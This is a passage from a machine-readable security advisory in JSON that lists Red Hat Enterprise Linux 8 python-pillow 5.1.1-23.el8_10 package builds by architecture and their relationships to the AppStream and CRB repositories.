"purl": "pkg:rpm/redhat/python3-pillow-debuginfo@5.1.1-23.el8_10?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"product": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"product_id": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-tk-debuginfo@5.1.1-23.el8_10?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.s390x",
"product": {
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.s390x",
"product_id": "python3-pillow-devel-0:5.1.1-23.el8_10.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-devel@5.1.1-23.el8_10?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.s390x",
"product": {
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.s390x",
"product_id": "python3-pillow-tk-0:5.1.1-23.el8_10.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-tk@5.1.1-23.el8_10?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-pillow-0:5.1.1-23.el8_10.aarch64",
"product": {
"name": "python3-pillow-0:5.1.1-23.el8_10.aarch64",
"product_id": "python3-pillow-0:5.1.1-23.el8_10.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow@5.1.1-23.el8_10?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"product": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"product_id": "python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debugsource@5.1.1-23.el8_10?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"product": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"product_id": "python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debuginfo@5.1.1-23.el8_10?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"product": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"product_id": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-debuginfo@5.1.1-23.el8_10?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"product": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"product_id": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-tk-debuginfo@5.1.1-23.el8_10?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.aarch64",
"product": {
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.aarch64",
"product_id": "python3-pillow-devel-0:5.1.1-23.el8_10.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-devel@5.1.1-23.el8_10?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.aarch64",
"product": {
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.aarch64",
"product_id": "python3-pillow-tk-0:5.1.1-23.el8_10.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-tk@5.1.1-23.el8_10?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-pillow-0:5.1.1-23.el8_10.ppc64le",
"product": {
"name": "python3-pillow-0:5.1.1-23.el8_10.ppc64le",
"product_id": "python3-pillow-0:5.1.1-23.el8_10.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow@5.1.1-23.el8_10?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"product": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"product_id": "python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debugsource@5.1.1-23.el8_10?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"product": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"product_id": "python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debuginfo@5.1.1-23.el8_10?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"product": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"product_id": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-debuginfo@5.1.1-23.el8_10?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"product": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"product_id": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-tk-debuginfo@5.1.1-23.el8_10?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le",
"product": {
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le",
"product_id": "python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-devel@5.1.1-23.el8_10?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le",
"product": {
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le",
"product_id": "python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-tk@5.1.1-23.el8_10?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-pillow-0:5.1.1-23.el8_10.x86_64",
"product": {
"name": "python3-pillow-0:5.1.1-23.el8_10.x86_64",
"product_id": "python3-pillow-0:5.1.1-23.el8_10.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow@5.1.1-23.el8_10?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"product": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"product_id": "python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debugsource@5.1.1-23.el8_10?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"product": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"product_id": "python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debuginfo@5.1.1-23.el8_10?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"product": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"product_id": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-debuginfo@5.1.1-23.el8_10?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64",
"product": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64",
"product_id": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-tk-debuginfo@5.1.1-23.el8_10?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.x86_64",
"product": {
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.x86_64",
"product_id": "python3-pillow-devel-0:5.1.1-23.el8_10.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-devel@5.1.1-23.el8_10?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.x86_64",
"product": {
"name": "python3-pillow-tk-0:5.1.1-23.el8_10.x86_64",
"product_id": "python3-pillow-tk-0:5.1.1-23.el8_10.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-tk@5.1.1-23.el8_10?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-pillow-0:5.1.1-23.el8_10.i686",
"product": {
"name": "python3-pillow-0:5.1.1-23.el8_10.i686",
"product_id": "python3-pillow-0:5.1.1-23.el8_10.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow@5.1.1-23.el8_10?arch=i686"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.i686",
"product": {
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.i686",
"product_id": "python3-pillow-devel-0:5.1.1-23.el8_10.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-devel@5.1.1-23.el8_10?arch=i686"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.i686",
"product": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.i686",
"product_id": "python-pillow-debugsource-0:5.1.1-23.el8_10.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debugsource@5.1.1-23.el8_10?arch=i686"
}
}
},
{
"category": "product_version",
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"product": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"product_id": "python-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-pillow-debuginfo@5.1.1-23.el8_10?arch=i686"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"product": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"product_id": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-debuginfo@5.1.1-23.el8_10?arch=i686"
}
}
},
{
"category": "product_version",
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686",
"product": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686",
"product_id": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-tk-debuginfo@5.1.1-23.el8_10?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-pillow-doc-0:5.1.1-23.el8_10.noarch",
"product": {
"name": "python3-pillow-doc-0:5.1.1-23.el8_10.noarch",
"product_id": "python3-pillow-doc-0:5.1.1-23.el8_10.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pillow-doc@5.1.1-23.el8_10?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-0:5.1.1-23.el8_10.src as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-pillow-0:5.1.1-23.el8_10.src"
},
"product_reference": "python-pillow-0:5.1.1-23.el8_10.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64"
},
"product_reference": "python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le"
},
"product_reference": "python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x"
},
"product_reference": "python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64"
},
"product_reference": "python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64"
},
"product_reference": "python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le"
},
"product_reference": "python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.s390x as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x"
},
"product_reference": "python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64"
},
"product_reference": "python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-0:5.1.1-23.el8_10.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.aarch64"
},
"product_reference": "python3-pillow-0:5.1.1-23.el8_10.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-0:5.1.1-23.el8_10.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.ppc64le"
},
"product_reference": "python3-pillow-0:5.1.1-23.el8_10.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-0:5.1.1-23.el8_10.s390x as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.s390x"
},
"product_reference": "python3-pillow-0:5.1.1-23.el8_10.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-0:5.1.1-23.el8_10.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.x86_64"
},
"product_reference": "python3-pillow-0:5.1.1-23.el8_10.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64"
},
"product_reference": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le"
},
"product_reference": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x"
},
"product_reference": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64"
},
"product_reference": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64"
},
"product_reference": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le"
},
"product_reference": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x"
},
"product_reference": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64"
},
"product_reference": "python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64"
},
"product_reference": "python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.i686 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.i686"
},
"product_reference": "python-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le"
},
"product_reference": "python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x"
},
"product_reference": "python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64"
},
"product_reference": "python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64"
},
"product_reference": "python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.i686 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.i686"
},
"product_reference": "python-pillow-debugsource-0:5.1.1-23.el8_10.i686",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le"
},
"product_reference": "python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.s390x as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x"
},
"product_reference": "python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64"
},
"product_reference": "python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-0:5.1.1-23.el8_10.i686 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.i686"
},
"product_reference": "python3-pillow-0:5.1.1-23.el8_10.i686",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64"
},
"product_reference": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686"
},
"product_reference": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le"
},
"product_reference": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x"
},
"product_reference": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64"
},
"product_reference": "python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.aarch64 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.aarch64"
},
"product_reference": "python3-pillow-devel-0:5.1.1-23.el8_10.aarch64",
"relates_to_product_reference": "CRB-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pillow-devel-0:5.1.1-23.el8_10.i686 as a component of Red Hat Enterprise Linux CRB (v. 8)",
"product_id": "CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.i686"
},
"product_reference": "python3-pillow-devel-0:5.1.1-23.el8_10.i686",
